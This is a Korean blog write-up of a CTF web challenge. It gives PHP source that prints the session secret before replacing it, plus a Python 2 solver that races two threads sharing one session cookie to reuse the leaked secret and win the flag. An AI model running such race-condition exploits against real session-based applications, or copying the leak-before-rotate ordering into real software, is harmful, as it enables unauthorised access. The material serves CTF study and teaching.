[ConfidenceCTF-teaser]Practical-Numerology
문제
<?php
// Challenge listing: a "lotto" game in which the player must POST the value
// held in $_SESSION['secret']. A correct guess prints the flag; a wrong guess
// prints the old secret and then replaces it.

/**
 * Builds the value stored as the session secret.
 *
 * Concatenates two SHA-1 hex digests (40 hex characters each), giving an
 * 80-character string, i.e. the 320 bits mentioned in the prompt below.
 * As listed, both digests are of the constant "123", so the result never
 * changes; presumably the deployed challenge used a random generator here
 * and this line is a redacted stand-in (not confirmable from the listing).
 */
function generate_secret() {
    return sha1("123").sha1("123");
}

session_start();

// First visit for this session: create the secret.
if(!isset($_SESSION['secret']))
    $_SESSION['secret'] = generate_secret();

// No guess submitted: show the prompt and this file's own source, then stop.
if(!isset($_POST['guess']))
{
    echo 'Wanna play lotto? Just try to guess 320 bits.<br/><br/>'.PHP_EOL;
    highlight_file(__FILE__);
    exit;
}

$guess = $_POST['guess'];

// Strict comparison: a non-string guess (for example an array) never matches.
// NOTE(review): === is not a constant-time comparison; hash_equals() is the
// usual choice when comparing a secret with user input.
if($guess === $_SESSION['secret'])
{
    // flag.php is not shown; presumably it returns the flag string.
    $flag = require('flag.php');
    exit('Lucky bastard! You won the flag! ' . $flag);
}

// else: wrong guess.
// NOTE(review): the current secret is written to the response here, before
// it is replaced by the last statement of the script. Until that assignment
// runs and the session is saved, the value already sent to the client is
// still the one stored in the session. If the session backend does not
// serialise concurrent requests that carry the same session ID (not visible
// in this listing), a second request can be compared against that value.
// Safer ordering: copy the old secret to a local variable, assign the new
// secret, call session_write_close(), and only then produce any output.
echo "Wrong! '{$_SESSION['secret']}' != '";
// The guess is HTML-escaped before being reflected; its length is not limited.
echo htmlspecialchars($guess);
echo "'";

// Rotate the secret only after all output above has been produced.
$_SESSION['secret'] = generate_secret();
|
풀이
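: 쓰레드를 이용한 레이스 컨디션. 오답일 때 서버는 현재 secret을 응답에 먼저 출력하고 스크립트의 마지막에서야 새 값으로 바꾸므로, 그 전에 같은 세션으로 도착한 요청은 방금 출력된 값과 비교된다 (동일 세션의 동시 요청이 직렬화되지 않는 환경이라는 전제).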
#!/usr/bin/python
# Solver script from the write-up for the PHP listing above.
# Python 2 only: it uses the `thread` and `httplib` modules and the print
# statement. Two threads send requests with the same PHPSESSID cookie:
# thread1 obtains the secret from a "Wrong!" response, thread2 submits it.
import thread
import httplib, urllib  # urllib is imported but not used below

# Shared between the two threads; stays empty until thread1 has read a value.
guess = ""

def thread1():
    """Send an oversized wrong guess and keep the secret echoed in the reply."""
    global guess
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Cookie": "PHPSESSID=123cookie" }
    conn = httplib.HTTPConnection("134.213.136.172", 80)
    # The guess is 100000 bytes long; the server reflects it after the secret,
    # presumably so that the response is still being sent while thread2 runs.
    conn.request("POST", "", "guess="+"A"*100000, headers)
    # Only the first 92 bytes are read. The response starts with "Wrong! '"
    # (8 characters) followed by the 80-character secret, hence [8:88].
    # The rest of the response is never read and the connection is not closed.
    guess = conn.getresponse().read(92)[8:88]

def thread2():
    """Wait for thread1's value, then submit it as the guess."""
    global guess
    headers = {"Content-type": "application/x-www-form-urlencoded",
               "Cookie": "PHPSESSID=123cookie" }
    # Busy-wait until thread1 has stored the value.
    while guess=="":
        pass
    conn = httplib.HTTPConnection("134.213.136.172", 80)
    conn.request("POST", "", "guess="+guess, headers)
    response = conn.getresponse()
    data = response.read()
    print data
    conn.close()

# thread2 is started first so that it is already polling when thread1 runs.
thread.start_new_thread(thread2, ())
thread.start_new_thread(thread1, ())
|
먼가 블로그에 올려야 겠다는 생각은 맨날 하는데.. 귀차니즘 때문에 자세히 포스팅은 안하는거 같네염..